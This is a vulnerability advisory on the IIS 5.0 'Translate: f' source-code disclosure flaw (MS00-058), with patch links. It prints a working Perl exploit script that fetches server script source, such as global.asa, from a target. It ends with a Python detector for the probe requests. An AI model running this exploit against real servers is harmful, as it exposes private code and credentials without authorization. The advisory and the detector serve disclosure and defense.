Microsoft IIS 5.0

2008-04-09 04:35:54 Source: Internet


Microsoft IIS 5.0 "Translate: f" Header Source Code Disclosure Vulnerability (MS00-058)

Published: 2000-08-14
Updated: 2000-08-14

Affected systems:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
Description:
BUGTRAQ ID: 1578
CVE(CAN) ID: CVE-2000-0778

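IIS is a popular HTTP server program developed by Microsoft and bundled with the Windows operating system.

IIS 5.0 has a vulnerability in how it handles certain HTTP requests that carry a special header. A remote attacker may exploit it to obtain the source code of scripts on the server.

If IIS 5.0 receives an HTTP request that contains a special header (Translate: f) and whose URL ends with a special character ("/"), IIS invokes the script processing engine incorrectly, which may disclose the file's source code to the remote user.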


<*Source: Daniel Docekal (ddoc@MIA.CZ)

Links: http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
http://www.ciac.org/ciac/bulletins/k-065.shtml
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>

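Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

smiler@vxd.org provided the following test code: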

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven´t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)

if (not $ARGV[0]) {
print qq~
Geee it´s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}

Recommendations:
Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS00-058) and a corresponding patch for this issue:
MS00-058: Patch Available for "Specialized Header" Vulnerability
Link: http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

Patch download:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
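
Alongside patching, captured raw HTTP requests (for example from a proxy or IDS) can be checked for the request shape this advisory describes: a "Translate: f" header together with a URL that names a script file and ends in "/" or, as in the test code above, "\". The Python below is an added example, not part of the original advisory or of any Microsoft tooling; the function names, the extension list and the sample requests are constructed for illustration.

```python
from urllib.parse import unquote

# Assumption: script extensions worth protecting; extend to match the server's script mappings.
SCRIPT_EXTS = (".asp", ".asa")

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, target, headers); header names are lowercased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers

def is_source_disclosure_probe(raw: bytes) -> bool:
    """True when the request carries 'Translate: f' and targets <script file> + trailing / or \\."""
    try:
        _method, target, headers = parse_request(raw)
    except ValueError:
        return False
    if headers.get("translate", "").lower() != "f":
        return False
    path = unquote(target.split("?", 1)[0])   # drop query string, decode %2f / %5c
    if not path.endswith(("/", "\\")):
        return False                           # no trailing separator after the file name
    leaf = path.rstrip("/\\").replace("\\", "/").rsplit("/", 1)[-1].lower()
    return leaf.endswith(SCRIPT_EXTS)

# Constructed sample requests (not taken from real traffic).
SAMPLES = {
    "probe_backslash": b"GET /global.asa\\ HTTP/1.0\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "probe_slash_encoded": b"GET /default.asp%2f HTTP/1.0\r\nHost: www.example.com\r\ntranslate: F\r\n\r\n",
    "translate_no_trailing": b"GET /docs/report.doc HTTP/1.1\r\nHost: www.example.com\r\nTranslate: f\r\n\r\n",
    "normal": b"GET /default.asp HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
}

def scan(samples):
    """Return the names of the samples that match the probe pattern."""
    return [name for name, raw in samples.items() if is_source_disclosure_probe(raw)]

if __name__ == "__main__":
    print(scan(SAMPLES))
```

The check is deliberately narrow: a request with the header but no trailing separator, or with a trailing separator on a non-script path, is not flagged.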
